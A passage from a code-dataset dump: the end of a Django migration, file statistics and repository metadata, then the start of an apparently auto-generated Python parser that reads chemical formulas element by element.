            ('package', 'width'),
        ]
    ] + [
        migrations.AlterField(
            model_name='packageline',
            name='unit_price_amount',
            field=models.DecimalField(decimal_places=3, max_digits=12),
        ),
    ]
| 36.628205
| 95
| 0.576129
| 282
| 2,857
| 5.648936
| 0.205674
| 0.073446
| 0.173258
| 0.200251
| 0.792216
| 0.792216
| 0.756434
| 0.702448
| 0.702448
| 0.702448
| 0
| 0.034097
| 0.312216
| 2,857
| 77
| 96
| 37.103896
| 0.77659
| 0.015051
| 0
| 0.647887
| 1
| 0
| 0.111517
| 0.00841
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.014085
| 0
| 0.056338
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82cdd768e390c8c1933ee27d570272fe87fa913b
| 275,486
|
py
|
Python
|
scripts/formula.py
|
DrewRJones/Metabolyze_Public
|
8ab8a659566ae367704417bde7834b28fb6ba363
|
[
"MIT"
] | null | null | null |
scripts/formula.py
|
DrewRJones/Metabolyze_Public
|
8ab8a659566ae367704417bde7834b28fb6ba363
|
[
"MIT"
] | null | null | null |
scripts/formula.py
|
DrewRJones/Metabolyze_Public
|
8ab8a659566ae367704417bde7834b28fb6ba363
|
[
"MIT"
] | null | null | null |
from collections import defaultdict
import re
class TreeNode(object):
    """A parse-tree node: the matched text, its input offset, and child nodes."""

    def __init__(self, text, offset, elements=None):
        self.text = text
        self.offset = offset
        # A falsy elements argument (None or empty) becomes a fresh list,
        # so instances never share a mutable default.
        self.elements = elements if elements else []

    def __iter__(self):
        # Iterating a node yields its child nodes in order.
        return iter(self.elements)
class TreeNode1(TreeNode):
    """Parse-tree node for a ``term``: named access to its two children."""

    def __init__(self, text, offset, elements):
        TreeNode.__init__(self, text, offset, elements)
        # Named aliases for the first two children of the term rule.
        self.element, self.count = elements[0], elements[1]
class TreeNode2(TreeNode):
    """Parse-tree node for a ``count``: named access to its leading digit child."""

    def __init__(self, text, offset, elements):
        TreeNode.__init__(self, text, offset, elements)
        # Named alias for the first child (the non-zero digit node).
        self.non_zero_digit = elements[0]
class ParseError(SyntaxError):
    """Raised when the input cannot be parsed by this grammar."""
# Unique sentinel marking a failed parse attempt; always compared by identity
# (``is`` / ``is not``), never by equality.
FAILURE = object()
class Grammar(object):
REGEX_1 = re.compile('^[1-9]')
REGEX_2 = re.compile('^[0-9]')
def _read_formula(self):
    """Parse the ``formula`` rule: one or more ``term`` nodes (``term+``).

    Returns a TreeNode covering the consumed input, or FAILURE. Generated
    packrat-parser code: statement order and offset bookkeeping are exact.
    """
    address0, index0 = FAILURE, self._offset
    # Packrat memoization: reuse a previously computed result at this offset.
    cached = self._cache['formula'].get(index0)
    if cached:
        self._offset = cached[1]
        return cached[0]
    # remaining0 counts how many more matches are still required (at least 1).
    remaining0, index1, elements0, address1 = 1, self._offset, [], True
    while address1 is not FAILURE:
        address1 = self._read_term()
        if address1 is not FAILURE:
            elements0.append(address1)
            remaining0 -= 1
    if remaining0 <= 0:
        # Matched at least one term: wrap the consumed span in a TreeNode.
        address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
        self._offset = self._offset  # no-op retained by the code generator
    else:
        address0 = FAILURE
    # Memoize (result, end offset) for this start offset.
    self._cache['formula'][index0] = (address0, self._offset)
    return address0
def _read_term(self):
    """Parse the ``term`` rule: an ``element`` followed by a ``count``.

    On success returns the node built by ``self._actions.make_term``;
    otherwise rewinds the offset and returns FAILURE. Generated
    packrat-parser code: statement order and offset bookkeeping are exact.
    """
    address0, index0 = FAILURE, self._offset
    # Packrat memoization: reuse a previously computed result at this offset.
    cached = self._cache['term'].get(index0)
    if cached:
        self._offset = cached[1]
        return cached[0]
    index1, elements0 = self._offset, []
    address1 = FAILURE
    address1 = self._read_element()
    if address1 is not FAILURE:
        elements0.append(address1)
        address2 = FAILURE
        address2 = self._read_count()
        if address2 is not FAILURE:
            elements0.append(address2)
        else:
            # Second item of the sequence failed: rewind to the start.
            elements0 = None
            self._offset = index1
    else:
        # First item of the sequence failed: rewind to the start.
        elements0 = None
        self._offset = index1
    if elements0 is None:
        address0 = FAILURE
    else:
        # Delegate node construction to the user-supplied actions object.
        address0 = self._actions.make_term(self._input, index1, self._offset, elements0)
        self._offset = self._offset  # no-op retained by the code generator
    # Memoize (result, end offset) for this start offset.
    self._cache['term'][index0] = (address0, self._offset)
    return address0
def _read_element(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['element'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1 = self._offset
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 2]
if chunk0 == 'Zr':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Zr"')
if address0 is FAILURE:
self._offset = index1
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 2]
if chunk1 == 'Zn':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Zn"')
if address0 is FAILURE:
self._offset = index1
chunk2 = None
if self._offset < self._input_size:
chunk2 = self._input[self._offset:self._offset + 2]
if chunk2 == 'Yb':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Yb"')
if address0 is FAILURE:
self._offset = index1
chunk3 = None
if self._offset < self._input_size:
chunk3 = self._input[self._offset:self._offset + 1]
if chunk3 == 'Y':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Y"')
if address0 is FAILURE:
self._offset = index1
chunk4 = None
if self._offset < self._input_size:
chunk4 = self._input[self._offset:self._offset + 2]
if chunk4 == 'Xe':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Xe"')
if address0 is FAILURE:
self._offset = index1
chunk5 = None
if self._offset < self._input_size:
chunk5 = self._input[self._offset:self._offset + 1]
if chunk5 == 'W':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"W"')
if address0 is FAILURE:
self._offset = index1
chunk6 = None
if self._offset < self._input_size:
chunk6 = self._input[self._offset:self._offset + 1]
if chunk6 == 'V':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"V"')
if address0 is FAILURE:
self._offset = index1
chunk7 = None
if self._offset < self._input_size:
chunk7 = self._input[self._offset:self._offset + 1]
if chunk7 == 'U':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"U"')
if address0 is FAILURE:
self._offset = index1
chunk8 = None
if self._offset < self._input_size:
chunk8 = self._input[self._offset:self._offset + 2]
if chunk8 == 'Tm':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Tm"')
if address0 is FAILURE:
self._offset = index1
chunk9 = None
if self._offset < self._input_size:
chunk9 = self._input[self._offset:self._offset + 2]
if chunk9 == 'Tl':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Tl"')
if address0 is FAILURE:
self._offset = index1
chunk10 = None
if self._offset < self._input_size:
chunk10 = self._input[self._offset:self._offset + 2]
if chunk10 == 'Ti':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ti"')
if address0 is FAILURE:
self._offset = index1
chunk11 = None
if self._offset < self._input_size:
chunk11 = self._input[self._offset:self._offset + 2]
if chunk11 == 'Th':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Th"')
if address0 is FAILURE:
self._offset = index1
chunk12 = None
if self._offset < self._input_size:
chunk12 = self._input[self._offset:self._offset + 2]
if chunk12 == 'Te':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Te"')
if address0 is FAILURE:
self._offset = index1
chunk13 = None
if self._offset < self._input_size:
chunk13 = self._input[self._offset:self._offset + 2]
if chunk13 == 'Tb':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Tb"')
if address0 is FAILURE:
self._offset = index1
chunk14 = None
if self._offset < self._input_size:
chunk14 = self._input[self._offset:self._offset + 2]
if chunk14 == 'Ta':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ta"')
if address0 is FAILURE:
self._offset = index1
chunk15 = None
if self._offset < self._input_size:
chunk15 = self._input[self._offset:self._offset + 2]
if chunk15 == 'Sr':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Sr"')
if address0 is FAILURE:
self._offset = index1
chunk16 = None
if self._offset < self._input_size:
chunk16 = self._input[self._offset:self._offset + 2]
if chunk16 == 'Sn':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Sn"')
if address0 is FAILURE:
self._offset = index1
chunk17 = None
if self._offset < self._input_size:
chunk17 = self._input[self._offset:self._offset + 2]
if chunk17 == 'Sm':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Sm"')
if address0 is FAILURE:
self._offset = index1
chunk18 = None
if self._offset < self._input_size:
chunk18 = self._input[self._offset:self._offset + 2]
if chunk18 == 'Si':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Si"')
if address0 is FAILURE:
self._offset = index1
chunk19 = None
if self._offset < self._input_size:
chunk19 = self._input[self._offset:self._offset + 2]
if chunk19 == 'Se':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Se"')
if address0 is FAILURE:
self._offset = index1
chunk20 = None
if self._offset < self._input_size:
chunk20 = self._input[self._offset:self._offset + 2]
if chunk20 == 'Sc':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Sc"')
if address0 is FAILURE:
self._offset = index1
chunk21 = None
if self._offset < self._input_size:
chunk21 = self._input[self._offset:self._offset + 2]
if chunk21 == 'Sb':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Sb"')
if address0 is FAILURE:
self._offset = index1
chunk22 = None
if self._offset < self._input_size:
chunk22 = self._input[self._offset:self._offset + 1]
if chunk22 == 'S':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"S"')
if address0 is FAILURE:
self._offset = index1
chunk23 = None
if self._offset < self._input_size:
chunk23 = self._input[self._offset:self._offset + 2]
if chunk23 == 'Ru':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ru"')
if address0 is FAILURE:
self._offset = index1
chunk24 = None
if self._offset < self._input_size:
chunk24 = self._input[self._offset:self._offset + 2]
if chunk24 == 'Rh':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Rh"')
if address0 is FAILURE:
self._offset = index1
chunk25 = None
if self._offset < self._input_size:
chunk25 = self._input[self._offset:self._offset + 2]
if chunk25 == 'Re':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Re"')
if address0 is FAILURE:
self._offset = index1
chunk26 = None
if self._offset < self._input_size:
chunk26 = self._input[self._offset:self._offset + 2]
if chunk26 == 'Rb':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Rb"')
if address0 is FAILURE:
self._offset = index1
chunk27 = None
if self._offset < self._input_size:
chunk27 = self._input[self._offset:self._offset + 2]
if chunk27 == 'Pt':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Pt"')
if address0 is FAILURE:
self._offset = index1
chunk28 = None
if self._offset < self._input_size:
chunk28 = self._input[self._offset:self._offset + 2]
if chunk28 == 'Pr':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Pr"')
if address0 is FAILURE:
self._offset = index1
chunk29 = None
if self._offset < self._input_size:
chunk29 = self._input[self._offset:self._offset + 2]
if chunk29 == 'Pd':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Pd"')
if address0 is FAILURE:
self._offset = index1
chunk30 = None
if self._offset < self._input_size:
chunk30 = self._input[self._offset:self._offset + 2]
if chunk30 == 'Pb':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Pb"')
if address0 is FAILURE:
self._offset = index1
chunk31 = None
if self._offset < self._input_size:
chunk31 = self._input[self._offset:self._offset + 1]
if chunk31 == 'P':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"P"')
if address0 is FAILURE:
self._offset = index1
chunk32 = None
if self._offset < self._input_size:
chunk32 = self._input[self._offset:self._offset + 2]
if chunk32 == 'Os':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Os"')
if address0 is FAILURE:
self._offset = index1
chunk33 = None
if self._offset < self._input_size:
chunk33 = self._input[self._offset:self._offset + 1]
if chunk33 == 'O':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"O"')
if address0 is FAILURE:
self._offset = index1
chunk34 = None
if self._offset < self._input_size:
chunk34 = self._input[self._offset:self._offset + 2]
if chunk34 == 'Ni':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ni"')
if address0 is FAILURE:
self._offset = index1
chunk35 = None
if self._offset < self._input_size:
chunk35 = self._input[self._offset:self._offset + 2]
if chunk35 == 'Ne':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ne"')
if address0 is FAILURE:
self._offset = index1
chunk36 = None
if self._offset < self._input_size:
chunk36 = self._input[self._offset:self._offset + 2]
if chunk36 == 'Nd':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Nd"')
if address0 is FAILURE:
self._offset = index1
chunk37 = None
if self._offset < self._input_size:
chunk37 = self._input[self._offset:self._offset + 2]
if chunk37 == 'Nb':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Nb"')
if address0 is FAILURE:
self._offset = index1
chunk38 = None
if self._offset < self._input_size:
chunk38 = self._input[self._offset:self._offset + 2]
if chunk38 == 'Na':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Na"')
if address0 is FAILURE:
self._offset = index1
chunk39 = None
if self._offset < self._input_size:
chunk39 = self._input[self._offset:self._offset + 1]
if chunk39 == 'N':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"N"')
if address0 is FAILURE:
self._offset = index1
chunk40 = None
if self._offset < self._input_size:
chunk40 = self._input[self._offset:self._offset + 2]
if chunk40 == 'Mo':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Mo"')
if address0 is FAILURE:
self._offset = index1
chunk41 = None
if self._offset < self._input_size:
chunk41 = self._input[self._offset:self._offset + 2]
if chunk41 == 'Mn':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Mn"')
if address0 is FAILURE:
self._offset = index1
chunk42 = None
if self._offset < self._input_size:
chunk42 = self._input[self._offset:self._offset + 2]
if chunk42 == 'Mg':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Mg"')
if address0 is FAILURE:
self._offset = index1
chunk43 = None
if self._offset < self._input_size:
chunk43 = self._input[self._offset:self._offset + 2]
if chunk43 == 'Lu':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Lu"')
if address0 is FAILURE:
self._offset = index1
chunk44 = None
if self._offset < self._input_size:
chunk44 = self._input[self._offset:self._offset + 2]
if chunk44 == 'Li':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Li"')
if address0 is FAILURE:
self._offset = index1
chunk45 = None
if self._offset < self._input_size:
chunk45 = self._input[self._offset:self._offset + 2]
if chunk45 == 'La':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"La"')
if address0 is FAILURE:
self._offset = index1
chunk46 = None
if self._offset < self._input_size:
chunk46 = self._input[self._offset:self._offset + 2]
if chunk46 == 'Kr':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Kr"')
if address0 is FAILURE:
self._offset = index1
chunk47 = None
if self._offset < self._input_size:
chunk47 = self._input[self._offset:self._offset + 1]
if chunk47 == 'K':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"K"')
if address0 is FAILURE:
self._offset = index1
chunk48 = None
if self._offset < self._input_size:
chunk48 = self._input[self._offset:self._offset + 2]
if chunk48 == 'Ir':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ir"')
if address0 is FAILURE:
self._offset = index1
chunk49 = None
if self._offset < self._input_size:
chunk49 = self._input[self._offset:self._offset + 2]
if chunk49 == 'In':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"In"')
if address0 is FAILURE:
self._offset = index1
chunk50 = None
if self._offset < self._input_size:
chunk50 = self._input[self._offset:self._offset + 1]
if chunk50 == 'I':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"I"')
if address0 is FAILURE:
self._offset = index1
chunk51 = None
if self._offset < self._input_size:
chunk51 = self._input[self._offset:self._offset + 2]
if chunk51 == 'Ho':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ho"')
if address0 is FAILURE:
self._offset = index1
chunk52 = None
if self._offset < self._input_size:
chunk52 = self._input[self._offset:self._offset + 2]
if chunk52 == 'Hg':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Hg"')
if address0 is FAILURE:
self._offset = index1
chunk53 = None
if self._offset < self._input_size:
chunk53 = self._input[self._offset:self._offset + 2]
if chunk53 == 'Hf':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Hf"')
if address0 is FAILURE:
self._offset = index1
chunk54 = None
if self._offset < self._input_size:
chunk54 = self._input[self._offset:self._offset + 2]
if chunk54 == 'He':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"He"')
if address0 is FAILURE:
self._offset = index1
chunk55 = None
if self._offset < self._input_size:
chunk55 = self._input[self._offset:self._offset + 1]
if chunk55 == 'H':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"H"')
if address0 is FAILURE:
self._offset = index1
chunk56 = None
if self._offset < self._input_size:
chunk56 = self._input[self._offset:self._offset + 2]
if chunk56 == 'Ge':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ge"')
if address0 is FAILURE:
self._offset = index1
chunk57 = None
if self._offset < self._input_size:
chunk57 = self._input[self._offset:self._offset + 2]
if chunk57 == 'Gd':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Gd"')
if address0 is FAILURE:
self._offset = index1
chunk58 = None
if self._offset < self._input_size:
chunk58 = self._input[self._offset:self._offset + 2]
if chunk58 == 'Ga':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ga"')
if address0 is FAILURE:
self._offset = index1
chunk59 = None
if self._offset < self._input_size:
chunk59 = self._input[self._offset:self._offset + 2]
if chunk59 == 'Fe':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Fe"')
if address0 is FAILURE:
self._offset = index1
chunk60 = None
if self._offset < self._input_size:
chunk60 = self._input[self._offset:self._offset + 1]
if chunk60 == 'F':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"F"')
if address0 is FAILURE:
self._offset = index1
chunk61 = None
if self._offset < self._input_size:
chunk61 = self._input[self._offset:self._offset + 2]
if chunk61 == 'Eu':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Eu"')
if address0 is FAILURE:
self._offset = index1
chunk62 = None
if self._offset < self._input_size:
chunk62 = self._input[self._offset:self._offset + 2]
if chunk62 == 'Er':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Er"')
if address0 is FAILURE:
self._offset = index1
chunk63 = None
if self._offset < self._input_size:
chunk63 = self._input[self._offset:self._offset + 2]
if chunk63 == 'Dy':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Dy"')
if address0 is FAILURE:
self._offset = index1
chunk64 = None
if self._offset < self._input_size:
chunk64 = self._input[self._offset:self._offset + 1]
if chunk64 == 'D':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"D"')
if address0 is FAILURE:
self._offset = index1
chunk65 = None
if self._offset < self._input_size:
chunk65 = self._input[self._offset:self._offset + 2]
if chunk65 == 'Cu':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Cu"')
if address0 is FAILURE:
self._offset = index1
chunk66 = None
if self._offset < self._input_size:
chunk66 = self._input[self._offset:self._offset + 2]
